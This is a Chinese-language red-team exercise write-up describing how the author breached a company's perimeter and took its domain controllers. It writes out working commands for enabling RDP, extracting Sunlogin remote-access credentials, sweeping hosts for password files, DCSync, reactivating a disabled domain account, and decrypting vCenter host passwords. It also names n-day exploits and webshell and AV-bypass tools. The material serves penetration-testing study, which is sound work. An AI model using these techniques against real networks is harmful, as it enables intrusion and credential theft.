攻防演练 | 记一次打穿xx公司域控

文章目录 外网打点资产识别寻找口子内网渗透杀软识别隧道搭建向日葵读取密码读注册表：运维机H3C 堡垒机gitlab 仓库禅道 外网打点 资产识别 使用 Ehole 快速识别重点资产链接：https://github.com/EdgeSecurityTeam/EHole PYTHON Ehole.exe -fofa 检测的域名 寻找口子 1、每个网站可以尝试默认密码或’admin’、1qazxsw2==== 等类似弱口令 这里通过 sysadmin/1 成功登入泛微后台 2、接着浏览其他站点，这里运气比较好发现了用友的 nday 3、访问接口 /servlet/~ic/bsh.servlet.BshServlet 执行命令 4、另外还存在用友 nc 任意文件上传漏洞，直接上哥斯拉 内网渗透 杀软识别 PYTHON tasklist /svc 把之前准备好的 bypass360 马子扔上去，成功上线 隧道搭建 ping 了一下发现机器出网，可以上 frp 搭建反向代理隧道 proxifier 配置相应的端口账密便可以进入内网 由于周六日没人防守，直接上 fscan 对各个 C 段开扫，发现网段里的弱口令或 web 漏洞，帮助我们拿下机器进一步横向，拿到机器后先做信息搜集，网段，机器信息，敏感文件，xshell、navicat 密码等常规的这里就不细说了 接着可以通过 mimikatz 抓取密码，抓不到明文也可以尝试到 cmd5 上进行破解，充值 100 块 100 条还是挺划算的，破解率较高，白嫖可以到这个网站 https://www.somd5.com 拿到机器的账号密码之后，若机器开启了 3389 端口可以选择 rdp 远程桌面过去，没开的话可以开启 3389 端口进行远程连接 PLAINTEXT #执行以下命令操作注册表来开启机器3389远程桌面服务REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f #执行以下命令操作注册表来关闭机器3389远程桌面服务 REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f #使用以下命令添加防火墙放行策略netsh firewall add portopening protocol = TCP port = 3389 name = rdp 但如果是正常办公时间，贸然登录过去会很容易引起对方的发现，若进程中有 sunlogin 进程，可以读取识别码和验证码，通过向日葵连接相对比较隐蔽 向日葵读取密码 PLAINTEXT 12345678910 注册表读取配置信息：reg query HKEY_USERS.DEFAULTSoftwareOraySunLoginSunloginClientSunloginInforeg query HKEY_USERS.DEFAULTSoftwareOraySunLoginSunloginClientSunloginGreenInfo 向日葵默认配置文件路径:安装版：C:Program FilesOraySunLoginSunloginClientconfig.ini便携版：C:ProgramDataOraySunloginClientconfig.ini本机验证码参数：encry_pwd本机识别码参数：fastcode(去掉开头字母)sunlogincode：判断用户是否登录状态 读注册表： 读默认配置文件： fastcode 去掉前面的数字 k 为本机识别码 278263893 使用脚本进行解密获得本机验证码 运维机 横向的时候优先拿运维机，一般运维机存储着大量的账号密码信息，比如这次无意中发现的运维机器是弱口令 administrator/111111 拿下后可通过运行 bat 收集服务器、网络拓扑、密码本、公司信息等重要文件。 HTML 1234567891011121314151617181920 dir /a /s /b d:"*.txt" dir /a /s /b d:"*.xml" dir /a /s /b d:"*.mdb" dir /a /s /b d:"*.sql" dir /a /s /b d:"*.mdf" dir /a /s /b d:"*.eml" dir /a /s /b d:"*.pst" dir /a /s /b d:"*conf*" dir /a /s /b d:"*bak*" dir /a /s /b d:"*pwd*" dir /a /s /b d:"*pass*" dir /a /s /b d:"*login*" dir /a /s /b d:"*user*"dir /a /s /b c:password.txtdir /a /s /b c:*.conf *.ini *.inc *.config dir /a /s /b c:conf.* config.* dir /a /s /b c:*.txt *.xls *.xlsx *.docx | findstr "拓扑"dir /a /s /b c:*.conf *.ini *.inc *.config | findstr "运维"dir /a /s /b c:*.txt *.xls *.xlsx *.docx | findstr "密码" >C:Users1.txt 最后收集了一堆密码本，可登录到各个重要系统，例如： H3C 堡垒机 gitlab 仓库 禅道 拿着密码本重新组合字典，对网段内的机器进行爆破，一般存在口令复用的情况，成功拿下几十台机器 获取域控 通过 fscan 扫描的时候可以检索 AD 关键字发现域控 PLAINTEXT 12345678 [*]192.168.10.38 #非真实域控ip [->]D1-Prod-AD-P01 [->]192.168.10.38 [*]192.168.10.20 #非真实域控ip [->]AD [->]192.168.10.20 接着可以通过该机器是否开放 53 和 389 端口进行进一步确认 爆破成功的机器里发现其中一台为域内机器，刚好该机器存在域管进程，提权到 system 权限后 inject 到域管进程，通过 Dcsync 成功获取域管密码的 hash 值，其中一个被禁用的账户刚好是弱口令，解出明文密码并激活账户，成功登录两台域控机器，除此以外还可以尝试域漏洞、NTLM 中继、委派等 PLAINTEXT 12345 net group "domain admins" /domaindcsync domain xxxxshell net user xxxxshell net user xxxx /active:yes /domain 云管平台 通过运维机的 xshell 查找历史记录拿下了主备数据库，然后执行 sql 语句成功获取出了云管平台的 hash 到 cmd5 上进行解密，一块钱拿下云管平台很划算 官网 通过云管平台登录官网机器，抓取浏览器密码成功获取后台密码 Vcenter 在扫描的过程中发现几台 Vcenter，Vcenter 常规有三种打法，分别是 CVE-2021-22005-rce、2021-21972-uoloadova 接口 rce 和 log4j，前两个测试过没成功，log4j 通过 dnslog 探测漏洞存在，vcenter 的漏洞触发点在 xff 头部，这里可手工打或者使用 sp4ce 师傅的工具 https://github.com/NS-Sp4ce/Vm4J 但一般打完是非交互式 shell，没有回显，这里使用命令切换为交互式 shell PLAINTEXT 1 python -c 'import pty;pty.spawn('/bin/bash')' 重置密码 PLAINTEXT 12 /usr/lib/vmware-vmdir/bin/vdcadmintool #重置密码 不重置密码获取密码 https://github.com/shmilylty/vhost\_password\_ decrypt PLAINTEXT 123456789101112131415161718 #获取vc用户的密码cat /etc/vmware-vpx/vcdb.properties #把加密后的密码单独拿出来，psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;" > password.enc#改成这种格式*H8BBiGe3kQqaujz3ptZvzhWXXZ0M6QOoOFIKL0p0cUDkWF/iMwikwt7BCrfEDRnXCqxoju4t2fsRV3xNMg==*zR20RvimwMPHz7U6LJW+GnmLod9pdHpdhIFO+Ooqk0/pn2NGDuKRae+ysy3rxBdwepRzNLdq6+paOgi54Q==*Q81OIBXziWr0orka0j++PKMSgw6f7kC0lCmITzSlbl/jCDTuRSs07oQnNFpSCC6IhZoPPto5ix0SccQPDw==*R6HqZzojKrFeshDIP8vXPMhN28mLDHiEEBSXWYXNHrQQvHcuLOFlLquI2oLRfqLiPlHwkmAxUj9hKj3VZA== #拿解密keycat /etc/vmware-vpx/ssl/symkey.datWindows：C:ProgramDataVMwarevCenterServercfgvmware-vpxsslsymkey.datLinux：/etc/vmware-vpx/ssl/symkey.dat #破解python decrypt.py symkey.dat password.enc pass.txt 然后就可以登入 web 控制台了，最后也是拿下了两台域控 本文作者：pony686， 转载请注明来自FreeBuf.COM 黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！ 如侵权请私聊我们删文 END